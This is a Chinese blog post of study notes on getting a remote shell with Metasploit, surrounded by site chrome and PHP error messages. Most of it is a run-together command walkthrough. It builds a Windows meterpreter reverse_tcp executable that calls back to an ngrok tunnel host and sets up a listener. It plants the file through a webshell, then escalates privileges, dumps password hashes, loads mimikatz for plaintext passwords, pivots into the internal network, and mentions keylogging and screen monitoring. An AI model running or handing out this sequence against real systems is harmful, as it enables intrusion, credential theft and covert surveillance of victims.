Warning: Undefined array key "night" in /www/wwwroot/dhaomu.com/wp-content/themes/b2/header.php on line 18

学习笔记 | Metasploit之弹个Shell

【摘要】一、简介:Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。二、bind_tcp弹个shell:我还没写~三、revers_tcp弹个shell:sun...

学习笔记 | Metasploit之弹个Shell插图

一、简介:

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。

二、bind_tcp弹个shell:

我还没写~

三、revers_tcp弹个shell:

sunny clientid 隧道id 即可启动服务生成反弹shellmsfvenom -p Windows/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=19286 -f exe > /tmp/reverse.exeMsfconsole#启动msfuse exploit/multi/handler#监听set payload windows/meterpreter/reverse_tcp#设置payload reverse_tcpset LHOST 0.0.0.0#设置本地监听所有IPset LPORT 端口#设置本地监听端口4444run即可然后上传reverse.exe至webshell运行revers.exe此时等待一会儿发现本机已经建立会话getuid //发现权限较低,为usergetsystem //提权migrate pid //进程注入提权hashdump //下载hashload mimikaz //读取明文pawdmeterpreter下: shell //进入对方shellportfwd add -l 本机端口 -r 远程主机IP -p 远程主机端口 //内网转发rdesktop a 32 127.0.0.1:本机端口 //远程链接moudle //模块payload //攻击载荷msvenom //msfpayload,msfencode的结合体msvenom -p 攻击载荷 -LHOST 本地IP -LPORT 本地端口 -f 文件格式 -o 输出目录use exploit/multi/handler 监听模块set payload 相同攻击载荷set lhost 0.0.0.0set lport 本地端口//建立会话后jobs 停止获取sessions -l //列出sessionsession -i id //进入meterpreter之后的对于具体操作 输入-help 或 ? 即可获取帮助比如键盘记录啊、屏幕监控run vnc等等的~

就到这里了,也可以使用background后,使用msf的exploit提权

温馨提示:
1.本站大部分内容均收集于网络!若内容若侵犯到您的权益,请发送邮件至:duhaomu@163.com,我们将第一时间处理!
2.资源所需价格并非资源售卖价格,是收集、整理、编辑详情以及本站运营的适当补贴,并且本站不提供任何免费技术支持。
3.所有资源仅限于参考和学习,版权归原作者所有,更多请阅读网站声明

给TA赞赏
共{{data.count}}人
人已赞赏
未整理

【投资技巧】定投十年赚十倍

2021-5-13 0:00:00

未整理

易优cms蓝色平面设计广告印刷网站模板源码 带手机版

2021-5-15 0:00:00

0 条回复 A文章作者 M管理员

Warning: Trying to access array offset on value of type null in /www/wwwroot/dhaomu.com/wp-content/themes/b2/functions.php on line 3914

Warning: Trying to access array offset on value of type null in /www/wwwroot/dhaomu.com/wp-content/themes/b2/functions.php on line 3914
----《》
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索